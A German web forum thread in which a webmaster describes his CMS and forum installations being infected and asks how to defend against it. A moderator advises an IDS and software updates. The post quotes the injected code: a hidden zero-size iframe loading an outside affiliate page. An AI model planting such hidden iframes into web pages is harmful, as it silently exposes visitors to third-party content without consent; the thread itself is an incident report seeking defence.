Danke Danke:  0
Gefällt mir Gefällt mir:  0
Dislikes Dislikes:  0
Ergebnis 1 bis 2 von 2

Thema: Wurm legt ganzen Webspace lahm

  1. #1

    Registriert seit
    25.12.04
    Danke (erhalten)
    0
    Gefällt mir (erhalten)
    0

    Standard Wurm legt ganzen Webspace lahm

    Anzeige
    Mein Webspace erlag letzter Nacht einer "Wurm-Attacke" oder was immer das war.
    So gegen 5.00 Uhr morgens entdeckte ich beim installieren eines neuen CMS (e107) einige Ungereimtheiten beim installieren.
    Im ACP bekam ich die Meldung, dass 2 Files in einem Ordner waren, die da nicht hingehören.

    Beim genaueren hinsehen machte sich schon das ausmaß der Zerstörung sichtbar.

    In 2 CMS (e107 Mainseite und Subdomain), sowie in 3 Woltlab Burning Boards 2.3.6 pl1 (acp htaccess) waren mit folgendem code verseucht:

    Code:
    html><iframe width=0 height=0 frameborder=0 src=http://www.free20.com/portal/index.php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>
    Der code ist c.a. 10 mal "eingebaut"

    Habe 2 Stunden die Serverlogfiles durchsucht, obs Zugriffe auf eine evtl. installierte Shell gab.
    Also ich mich ins confixx einloggen wollte (so gegen 10 Uhr heute morgen), musste ich feststellen, dass sogar der Login darin infiziert war.

    Meine Frage jetzt - welche Möglichkeiten habe ich um mich gegen solche Angriffe zu schützen.
    Kann es sein, dass "der Wurm" evtl. über eine eingeschleuste Shell auf den Webspace kam?
    Der ganze Server scheint infiziert zu sein (habe ja wie gesagt nur Webspace).
    Global_Register ist Serverseitig auf off gestellt und beim überprüfen des Stammverzeichnisses mit einer c99 Shell wurde der status secure angezeigt.

    Eine wirklich ärgerliche Sache, die mir echt auf den Magen schlägt ( und auf meine Schlafgewohnheiten, bin immmer noch wach ... :( )

  2. #2
    Moderator Avatar von Elderan
    Registriert seit
    30.03.04
    Danke (erhalten)
    0
    Gefällt mir (erhalten)
    26

    Standard

    Anzeige
    Hallo,
    das Beste ist eine (externe) IDS und ein externer Logfile-Server. Mit diesen beiden Mitteln kann man eigentlich sehr schnell ausmachen, was die Ursache dafür war (sofern man es nicht mit einem sehr guten Cracker zu tun hat), woher er kam, welche Lücken er ausgenutzt hat etc.

    Da du aber nur Webspace hast, wird das wohl schwer.
    Naja sonst evt. mal die PHP Version überprüfen, ob es die neuste ist, weil der März (?) ja der Month of PHP Bugs war, und evt. fährst du noch mit einer alten, unsicheren Version.

    Dann als nächstest überprüfen, ob dass CMS, die Boards, Confixx und ähnliches Lücken aufweisen die bekannt sind und evt. auf den neusten Stand bringen.


    PS: Was macht man denn schon um 5 Uhr morgens??

Ähnliche Themen

  1. Firefox 3 legt einen "Desktop" Ordner an
    Von xeno im Forum Applikationen
    Antworten: 8
    Letzter Beitrag: 17.08.08, 14:53
  2. Microsoft legt Schnittstellen offen
    Von lBr1anl im Forum News & Ankündigungen
    Antworten: 16
    Letzter Beitrag: 24.02.08, 12:42
  3. Antworten: 0
    Letzter Beitrag: 28.06.07, 15:58
  4. Virus der den CPU-Lüfter lahm legt???
    Von Cracker im Forum Die Problemzone
    Antworten: 6
    Letzter Beitrag: 02.07.05, 21:13
  5. Wurm legt Teile des Internet lahm
    Von Mackz im Forum News & Ankündigungen
    Antworten: 0
    Letzter Beitrag: 25.01.03, 20:07

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •